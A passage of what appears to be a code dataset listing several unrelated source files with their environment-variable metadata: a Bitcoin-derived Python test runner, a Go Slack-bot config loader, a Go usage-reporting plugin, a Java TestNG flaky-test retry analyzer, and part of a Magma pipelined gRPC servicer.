parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
parser.add_argument('--force', '-f', action='store_true', help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true', help='only print dots, results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
config.read_file(open(configfile))
passon_args.append("--configfile=%s" % configfile)
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = "%s/oasis_test_runner_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
os.makedirs(tmpdir)
logging.debug("Temporary test directory at %s" % tmpdir)
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print("Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print("No functional tests to run. Wallet, utils, and oasisd must all be enabled")
print("Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the ALL_SCRIPTS list. Accept the name with or without .py extension.
tests = [re.sub(r"\.py$", "", t) + ".py" for t in tests]
test_list = []
for t in tests:
if t in ALL_SCRIPTS:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], t))
else:
# No individual tests have been specified.
# Run all base tests, and optionally run extended tests.
test_list = BASE_SCRIPTS
if args.extended:
# place the EXTENDED_SCRIPTS first since the three longest ones
# are there and the list is shorter
test_list = EXTENDED_SCRIPTS + test_list
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t) + ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script (with args removed) and exit.
parser.print_help()
subprocess.check_call([(config["environment"]["SRCDIR"] + '/test/functional/' + test_list[0].split()[0])] + ['-h'])
sys.exit(0)
check_script_list(config["environment"]["SRCDIR"])
check_script_prefixes()
if not args.keepcache:
shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)
run_tests(test_list,
config["environment"]["SRCDIR"],
config["environment"]["BUILDDIR"],
config["environment"]["EXEEXT"],
tmpdir,
args.jobs, args.coverage,
passon_args, args.combinedlogslen,
args.keepcache)
def run_tests(test_list, src_dir, build_dir, exeext, tmpdir, jobs=1, enable_coverage=False, args=[], combined_logs_len=0, keep_cache=False):
# Warn if oasisd is already running (unix only)
try:
if subprocess.check_output(["pidof", "oasisd"]) is not None:
print("%sWARNING!%s There is already a oasisd process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = "%s/test/cache" % build_dir
if os.path.isdir(cache_dir):
print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir))
#Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = build_dir + '/src/oasisd' + exeext
os.environ["BITCOINCLI"] = build_dir + '/src/oasis-cli' + exeext
tests_dir = src_dir + '/test/functional/'
flags = ["--srcdir={}/src".format(build_dir)] + args
flags.append("--cachedir=%s" % cache_dir)
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug("Initializing coverage directory at %s" % coverage.dir)
else:
coverage = None
if len(test_list) > 1 and jobs > 1:
# Populate cache
# Send a ping message every 5 minutes to not get stalled on Travis.
import threading
pingTime = 5 * 60
stopTimer = False
def pingTravis():
if stopTimer:
return
print("- Creating cache in progress...")
sys.stdout.flush()
threading.Timer(pingTime, pingTravis).start()
if not keep_cache:
pingTravis()
try:
subprocess.check_output([tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
finally:
stopTimer = True
#Run Tests
job_queue = TestHandler(jobs, tests_dir, tmpdir, test_list, flags)
time0 = time.time()
test_results = []
max_len_name = len(max(test_list, key=len))
test_count = len(test_list)
for i in range(test_count):
test_result, testdir, stdout, stderr = job_queue.get_next()
test_results.append(test_result)
done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0])
if test_result.status == "Passed":
if stderr == "":
logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time))
else:
logging.debug("%s passed (with warnings), Duration: %s s" % (done_str, test_result.time))
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
elif test_result.status == "Skipped":
logging.debug("%s skipped" % (done_str))
else:
print("%s failed, Duration: %s s\n" % (done_str, test_result.time))
print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n')
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([os.path.join(tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
print_results(test_results, max_len_name, (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n%s | %s | %s s (accumulated) \n" % ("ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: %s s\n" % (runtime)
print(results)
class TestHandler:
"""
Trigger the test scripts passed in via the list.
"""
def __init__(self, num_tests_parallel, tests_dir, tmpdir, test_list=None, flags=None):
assert(num_tests_parallel >= 1)
self.num_jobs = num_tests_parallel
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_list = test_list
self.flags = flags
self.num_running = 0
# In case there is a graveyard of zombie oasisds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
self.portseed_offset = int(time.time() * 1000) % 625
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
t = self.test_list.pop(0)
portseed = len(self.test_list) + self.portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
self.jobs.append((t,
time.time(),
subprocess.Popen([self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
testdir,
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
# Print remaining running jobs when all jobs have been started.
if not self.test_list:
print("Remaining jobs: [{}]".format(", ".join(j[0] for j in self.jobs)))
dot_count = 0
while True:
# Return first proc that finishes
time.sleep(.5)
for j in self.jobs:
(name, time0, proc, testdir, log_out, log_err) = j
if os.getenv('TRAVIS') == 'true' and int(time.time() - time0) > 20 * 60:
# In travis, timeout individual tests after 20 minutes (to stop tests hanging and not
# providing useful output).
proc.send_signal(signal.SIGINT)
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [l.read().decode('utf-8') for l in (log_out, log_err)]
log_out.close(), log_err.close()
if proc.returncode == TEST_EXIT_PASSED:
status = "Passed"
elif proc.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
self.num_running -= 1
self.jobs.remove(j)
clearline = '\r' + (' ' * dot_count) + '\r'
print(clearline, end='', flush=True)
dot_count = 0
return TestResult(name, status, int(time.time() - time0)), testdir, stdout, stderr
print('.', end='', flush=True)
dot_count += 1
class TestResult():
def __init__(self, name, status, time):
self.name = name
self.status = status
self.time = time
self.padding = 0
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "%s | %s%s | %s s\n" % (self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def check_script_prefixes():
"""Check that at most a handful of the
test scripts don't start with one of the allowed name prefixes."""
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 10
good_prefixes_re = re.compile("(example|feature|interface|mempool|mining|p2p|rpc|wallet|zerocoin)_")
bad_script_names = [script for script in ALL_SCRIPTS if good_prefixes_re.match(script) is None]
if len(bad_script_names) > 0:
print("INFO: %d tests not meeting naming conventions:" % (len(bad_script_names)))
print(" %s" % ("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= LEEWAY, "Too many tests not following naming convention! (%d found, maximum: %d)" % (len(bad_script_names), LEEWAY)
def check_script_list(src_dir):
"""Check scripts directory.
Check that there are no scripts in the functional tests directory which are
not being run by pull-tester.py."""
script_dir = src_dir + '/test/functional/'
python_files = set([t for t in os.listdir(script_dir) if t[-3:] == ".py"])
missed_tests = list(python_files - set(map(lambda x: x.split()[0], ALL_SCRIPTS + NON_SCRIPTS)))
if len(missed_tests) != 0:
print("%sWARNING!%s The following scripts are not being run: %s. Check the test lists in test_runner.py." % (BOLD[1], BOLD[0], str(missed_tests)))
if os.getenv('TRAVIS') == 'true':
# On travis this warning is an error to prevent merging incomplete commits into master
sys.exit(1)
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `oasis-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
main()
|
[] |
[] |
[
"BITCOINCLI",
"TRAVIS",
"BITCOIND"
] |
[]
|
["BITCOINCLI", "TRAVIS", "BITCOIND"]
|
python
| 3 | 0 | |
config/config.go
|
package config
import (
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/apex/log"
"github.com/apex/log/handlers/json"
"github.com/apex/log/handlers/text"
yaml "gopkg.in/yaml.v2"
)
var Conf Configurator
func init() {
Conf, _ = ParseFile(os.Getenv("KUBOT_CONFIG"))
}
func InitLogging(logFilename string, logLevel string) (*os.File, error) {
logFile, err := os.OpenFile(logFilename, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
if err == nil {
log.SetHandler(json.New(logFile))
} else {
log.WithError(err).WithField("logfile", logFilename).Error("Failed to create log file, using console instead")
log.SetHandler(text.New(os.Stdout))
}
log.SetLevelFromString(logLevel)
return logFile, err
}
type Config struct {
Environments []Environment `yaml:"environments"`
SlackToken string `yaml:"slackToken"`
Logging Logging `yaml:"logging"`
Commands []Command `yaml:"commands"`
CommandConfig map[string]string `yaml:"commandConfig"`
CommandPrefix string `yaml:"commandPrefix"`
Init []Command `yaml:"init"`
}
type Configurator interface {
HasAccess(id string, env string) bool
GetEnvironmentByChannel(ch string) (*Environment, error)
GetSlackToken() string
GetLogging() Logging
GetCommand(name string, product string) (*Command, error)
GetCommands() []string
GetCommandConfig() map[string]string
GetCommandPrefix() string
GetInit() []Command
}
type Command struct {
Name string `yaml:"name"`
Product string `yaml:"product"`
ChannelStdout bool `yaml:"channelStdout"`
Commands []Command `yaml:"commands"`
Args []string `yaml:"args"`
Config map[string]string `yaml:"config"`
}
type Logging struct {
File string `yaml:"file"`
Level string `yaml:"level"`
}
func ParseFile(f string) (Configurator, error) {
file, err := os.Open(f)
if err != nil {
return Config{}, err
}
input, err := ioutil.ReadAll(file)
if err != nil {
return Config{}, err
}
bytes := []byte(input)
config, err := Parse(bytes)
if err != nil {
return Config{}, err
}
log.WithField("path", f).WithField("environments", len(config.Environments)).Info("configuration file loaded")
return config, nil
}
func Parse(bs []byte) (Config, error) {
var config Config
err := yaml.Unmarshal(bs, &config)
return config, err
}
func (c Config) GetEnvironment(env string) (*Environment, error) {
for _, e := range c.Environments {
if e.Name == env {
return &e, nil
}
}
return nil, fmt.Errorf("Environment '%v' not found", env)
}
func (c Config) GetEnvironmentByChannel(ch string) (*Environment, error) {
for _, e := range c.Environments {
if e.Channel == ch {
return &e, nil
}
}
return nil, fmt.Errorf("Environment not found for channel: '%v'", ch)
}
func (c Config) GetSlackToken() string {
return c.SlackToken
}
func (c Config) GetLogging() Logging {
return c.Logging
}
func (c Config) HasAccess(user string, env string) bool {
e, err := c.GetEnvironment(env)
if err != nil {
return false
}
return e.ContainsUser(user)
}
func (c Config) GetCommands() []string {
commands := []string{}
for _, cmd := range c.Commands {
commands = append(commands, cmd.Name)
}
return commands
}
func (c Config) GetCommandConfig() map[string]string {
config := map[string]string{}
for k, v := range c.CommandConfig {
config[k] = v
}
return config
}
func (c Config) GetCommand(name string, product string) (*Command, error) {
for _, cmd := range c.Commands {
if cmd.Name == name && cmd.Product == product {
return &cmd, nil
}
}
for _, cmd := range c.Commands {
if cmd.Name == name && cmd.Product == "" {
return &cmd, nil
}
}
return nil, fmt.Errorf("command not found: %s", name)
}
func (c Config) GetCommandPrefix() string {
return c.CommandPrefix
}
func (c Config) GetInit() []Command {
return c.Init
}
|
[
"\"KUBOT_CONFIG\""
] |
[] |
[
"KUBOT_CONFIG"
] |
[]
|
["KUBOT_CONFIG"]
|
go
| 1 | 0 | |
cmd/usage/plugin.go
|
package usage
import (
"math/rand"
"net/http"
"os"
"sync/atomic"
"time"
"github.com/2637309949/micro/v3/plugin"
"github.com/2637309949/micro/v3/service/registry"
"github.com/2637309949/micro/v3/util/backoff"
"github.com/urfave/cli/v2"
)
func init() {
plugin.Register(Plugin())
}
func Plugin() plugin.Plugin {
var requests uint64
// create rand
source := rand.NewSource(time.Now().UnixNano())
r := rand.New(source)
return plugin.NewPlugin(
plugin.WithName("usage"),
plugin.WithInit(func(c *cli.Context) error {
// only do if enabled
if !c.Bool("report_usage") {
os.Setenv("MICRO_REPORT_USAGE", "false")
return nil
}
var service string
// set service name
if c.Args().Len() > 0 && len(c.Args().Get(0)) > 0 {
service = c.Args().Get(0)
}
// service subcommand
if service == "service" {
// set as the sub command
if v := c.Args().Get(1); len(v) > 0 {
service = v
}
}
// kick off the tracker
go func() {
// new report
u := New(service)
// initial publish in 30-60 seconds
d := 30 + r.Intn(30)
time.Sleep(time.Second * time.Duration(d))
for {
// get service list
s, _ := registry.ListServices()
// get requests
reqs := atomic.LoadUint64(&requests)
srvs := uint64(len(s))
// reset requests
atomic.StoreUint64(&requests, 0)
// set metrics
u.Metrics.Count["instances"] = uint64(1)
u.Metrics.Count["requests"] = reqs
u.Metrics.Count["services"] = srvs
// attempt to send report 3 times
for i := 1; i <= 3; i++ {
if err := Report(u); err != nil {
time.Sleep(backoff.Do(i * 2))
continue
}
break
}
// now sleep 24 hours
time.Sleep(time.Hour * 24)
}
}()
return nil
}),
plugin.WithHandler(func(h http.Handler) http.Handler {
// only enable if set
if v := os.Getenv("MICRO_REPORT_USAGE"); v == "false" {
return h
}
// return usage recorder
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// count requests
atomic.AddUint64(&requests, 1)
// serve the request
h.ServeHTTP(w, r)
})
}),
)
}
|
[
"\"MICRO_REPORT_USAGE\""
] |
[] |
[
"MICRO_REPORT_USAGE"
] |
[]
|
["MICRO_REPORT_USAGE"]
|
go
| 1 | 0 | |
presto-testng-services/src/main/java/io/prestosql/testng/services/FlakyTestRetryAnalyzer.java
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.testng.services;
import com.google.common.annotations.VisibleForTesting;
import io.airlift.log.Logger;
import org.testng.IRetryAnalyzer;
import org.testng.ITestNGMethod;
import org.testng.ITestResult;
import javax.annotation.concurrent.GuardedBy;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Pattern;
import java.util.stream.Stream;
import static com.google.common.base.Throwables.getStackTraceAsString;
import static com.google.common.collect.ImmutableList.toImmutableList;
import static java.lang.Boolean.parseBoolean;
import static java.lang.String.format;
public class FlakyTestRetryAnalyzer
implements IRetryAnalyzer
{
private static final Logger log = Logger.get(FlakyTestRetryAnalyzer.class);
// This property exists so that flaky tests are retried on CI only by default, while tests of the retry behavior still pass locally.
// TODO replace pom.xml property with explicit invocation of a testng runner (test suite with a test) and amend the retryer behavior on that level
private static final String ENABLED_SYSTEM_PROPERTY = "io.prestosql.testng.services.FlakyTestRetryAnalyzer.enabled";
@VisibleForTesting
static final int ALLOWED_RETRIES_COUNT = 2;
@GuardedBy("this")
private final Map<String, Long> retryCounter = new HashMap<>();
@Override
public boolean retry(ITestResult result)
{
if (result.isSuccess()) {
return false;
}
String enabledSystemPropertyValue = System.getProperty(ENABLED_SYSTEM_PROPERTY);
if (enabledSystemPropertyValue != null) {
if (!parseBoolean(enabledSystemPropertyValue)) {
log.info("not retrying; FlakyTestRetryAnalyzer explicitly disabled ('%s' property set to '%s')", ENABLED_SYSTEM_PROPERTY, enabledSystemPropertyValue);
return false;
}
}
// Enable retry on CI by default
if (System.getenv("CONTINUOUS_INTEGRATION") == null) {
log.info("not retrying; FlakyTestRetryAnalyzer not enabled as CONTINUOUS_INTEGRATION environment was not detected");
return false;
}
Method javaMethod = result.getMethod().getConstructorOrMethod().getMethod();
if (javaMethod == null) {
log.info("not retrying; cannot get java method");
return false;
}
Flaky annotation = javaMethod.getAnnotation(Flaky.class);
if (annotation == null) {
log.info("not retrying; @Flaky annotation not present");
return false;
}
if (result.getThrowable() == null) {
log.info("not retrying; throwable not present in result");
return false;
}
String stackTrace = getStackTraceAsString(result.getThrowable());
if (!Pattern.compile(annotation.match()).matcher(stackTrace).find()) {
log.warn("not retrying; stacktrace '%s' does not match pattern '%s'", stackTrace, annotation.match());
return false;
}
long retryCount;
ITestNGMethod method = result.getMethod();
synchronized (this) {
String name = getName(method, result.getParameters());
retryCount = retryCounter.getOrDefault(name, 0L);
retryCount++;
if (retryCount > ALLOWED_RETRIES_COUNT) {
return false;
}
retryCounter.put(name, retryCount);
}
log.warn(
result.getThrowable(),
"Test %s::%s attempt %s failed, retrying...,",
result.getTestClass().getName(),
method.getMethodName(),
retryCount);
return true;
}
private static String getName(ITestNGMethod method, Object[] parameters)
{
String actualTestClass = method.getTestClass().getName();
if (parameters.length != 0) {
return format(
"%s::%s(%s)",
actualTestClass,
method.getMethodName(),
String.join(",", Stream.of(parameters).map(Object::toString).collect(toImmutableList())));
}
return format("%s::%s", actualTestClass, method.getMethodName());
}
}
|
[
"\"CONTINUOUS_INTEGRATION\""
] |
[] |
[
"CONTINUOUS_INTEGRATION"
] |
[]
|
["CONTINUOUS_INTEGRATION"]
|
java
| 1 | 0 | |
lte/gateway/python/magma/pipelined/rpc_servicer.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import logging
import queue
from concurrent.futures import Future
from itertools import chain
from typing import List, Tuple
import grpc
from lte.protos import pipelined_pb2_grpc
from lte.protos.pipelined_pb2 import (
SetupFlowsResult,
RequestOriginType,
ActivateFlowsResult,
DeactivateFlowsResult,
FlowResponse,
RuleModResult,
SetupUEMacRequest,
SetupPolicyRequest,
SetupQuotaRequest,
ActivateFlowsRequest,
AllTableAssignments,
TableAssignment)
from lte.protos.policydb_pb2 import PolicyRule
from lte.protos.mobilityd_pb2 import IPAddress
from lte.protos.subscriberdb_pb2 import AggregatedMaximumBitrate
from magma.pipelined.app.dpi import DPIController
from magma.pipelined.app.enforcement import EnforcementController
from magma.pipelined.app.enforcement_stats import EnforcementStatsController
from magma.pipelined.app.ue_mac import UEMacAddressController
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.app.check_quota import CheckQuotaController
from magma.pipelined.app.vlan_learn import VlanLearnController
from magma.pipelined.app.tunnel_learn import TunnelLearnController
from magma.pipelined.policy_converters import convert_ipv4_str_to_ip_proto, \
convert_ipv6_bytes_to_ip_proto
from magma.pipelined.ipv6_prefix_store import get_ipv6_interface_id, get_ipv6_prefix
from magma.pipelined.metrics import (
ENFORCEMENT_STATS_RULE_INSTALL_FAIL,
ENFORCEMENT_RULE_INSTALL_FAIL,
)
grpc_msg_queue = queue.Queue()
class PipelinedRpcServicer(pipelined_pb2_grpc.PipelinedServicer):
"""
gRPC based server for Pipelined.
"""
def __init__(self, loop, gy_app, enforcer_app, enforcement_stats, dpi_app,
ue_mac_app, check_quota_app, ipfix_app, vlan_learn_app,
tunnel_learn_app, classifier_app, service_config, service_manager):
self._loop = loop
self._gy_app = gy_app
self._enforcer_app = enforcer_app
self._enforcement_stats = enforcement_stats
self._dpi_app = dpi_app
self._ue_mac_app = ue_mac_app
self._check_quota_app = check_quota_app
self._ipfix_app = ipfix_app
self._vlan_learn_app = vlan_learn_app
self._tunnel_learn_app = tunnel_learn_app
self._service_config = service_config
self._classifier_app = classifier_app
self._service_manager = service_manager
self._print_grpc_payload = os.environ.get('MAGMA_PRINT_GRPC_PAYLOAD')
if self._print_grpc_payload is None:
self._print_grpc_payload = \
service_config.get('magma_print_grpc_payload', False)
def add_to_server(self, server):
"""
Add the servicer to a gRPC server
"""
pipelined_pb2_grpc.add_PipelinedServicer_to_server(self, server)
# --------------------------
# Enforcement App
# --------------------------
def SetupPolicyFlows(self, request, context) -> SetupFlowsResult:
"""
Setup flows for all subscribers, used on pipelined restarts
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
for controller in [self._gy_app, self._enforcer_app,
self._enforcement_stats]:
ret = controller.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_flows,
request, fut)
return fut.result()
def _setup_flows(self, request: SetupPolicyRequest,
fut: 'Future[List[SetupFlowsResult]]'
) -> SetupFlowsResult:
gx_reqs = [req for req in request.requests
if req.request_origin.type == RequestOriginType.GX]
gy_reqs = [req for req in request.requests
if req.request_origin.type == RequestOriginType.GY]
enforcement_res = self._enforcer_app.handle_restart(gx_reqs)
# TODO check these results and aggregate
self._gy_app.handle_restart(gy_reqs)
self._enforcement_stats.handle_restart(gx_reqs)
fut.set_result(enforcement_res)
def ActivateFlows(self, request, context):
"""
Activate flows for a subscriber based on the pre-defined rules
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
fut = Future() # type: Future[ActivateFlowsResult]
self._loop.call_soon_threadsafe(self._activate_flows, request, fut)
return fut.result()
def _update_ipv6_prefix_store(self, ipv6_addr: bytes):
ipv6_str = ipv6_addr.decode('utf-8')
interface = get_ipv6_interface_id(ipv6_str)
prefix = get_ipv6_prefix(ipv6_str)
self._service_manager.interface_to_prefix_mapper.save_prefix(
interface, prefix)
def _update_version(self, request: ActivateFlowsRequest, ipv4: IPAddress):
"""
Update version for a given subscriber and rule.
"""
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ipv4, rule_id)
for rule in request.dynamic_rules:
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ipv4, rule.id)
def _activate_flows(self, request: ActivateFlowsRequest,
fut: 'Future[ActivateFlowsResult]'
) -> None:
"""
Activate flows for ipv4 / ipv6 or both
CWF won't have an ip_addr passed
"""
ret = ActivateFlowsResult()
if self._service_config['setup_type'] == 'CWF' or request.ip_addr:
ipv4 = convert_ipv4_str_to_ip_proto(request.ip_addr)
if request.request_origin.type == RequestOriginType.GX:
ret_ipv4 = self._install_flows_gx(request, ipv4)
else:
ret_ipv4 = self._install_flows_gy(request, ipv4)
ret.static_rule_results.extend(ret_ipv4.static_rule_results)
ret.dynamic_rule_results.extend(ret_ipv4.dynamic_rule_results)
if request.ipv6_addr:
ipv6 = convert_ipv6_bytes_to_ip_proto(request.ipv6_addr)
self._update_ipv6_prefix_store(request.ipv6_addr)
if request.request_origin.type == RequestOriginType.GX:
ret_ipv6 = self._install_flows_gx(request, ipv6)
else:
ret_ipv6 = self._install_flows_gy(request, ipv6)
ret.static_rule_results.extend(ret_ipv6.static_rule_results)
ret.dynamic_rule_results.extend(ret_ipv6.dynamic_rule_results)
fut.set_result(ret)
def _install_flows_gx(self, request: ActivateFlowsRequest,
ip_address: IPAddress
) -> ActivateFlowsResult:
"""
Ensure that the RuleModResult is only successful if the flows are
successfully added in both the enforcer app and enforcement_stats.
Install enforcement_stats flows first because even if the enforcement
flow install fails after, no traffic will be directed to the
enforcement_stats flows.
"""
logging.debug('Activating GX flows for %s', request.sid.id)
self._update_version(request, ip_address)
# Install rules in enforcement stats
enforcement_stats_res = self._activate_rules_in_enforcement_stats(
request.sid.id, ip_address, request.apn_ambr, request.rule_ids,
request.dynamic_rules)
failed_static_rule_results, failed_dynamic_rule_results = \
_retrieve_failed_results(enforcement_stats_res)
# Do not install any rules that failed to install in enforcement_stats.
static_rule_ids = \
_filter_failed_static_rule_ids(request, failed_static_rule_results)
dynamic_rules = \
_filter_failed_dynamic_rules(request, failed_dynamic_rule_results)
enforcement_res = self._activate_rules_in_enforcement(
request.sid.id, ip_address, request.apn_ambr, static_rule_ids,
dynamic_rules)
# Include the failed rules from enforcement_stats in the response.
enforcement_res.static_rule_results.extend(failed_static_rule_results)
enforcement_res.dynamic_rule_results.extend(
failed_dynamic_rule_results)
return enforcement_res
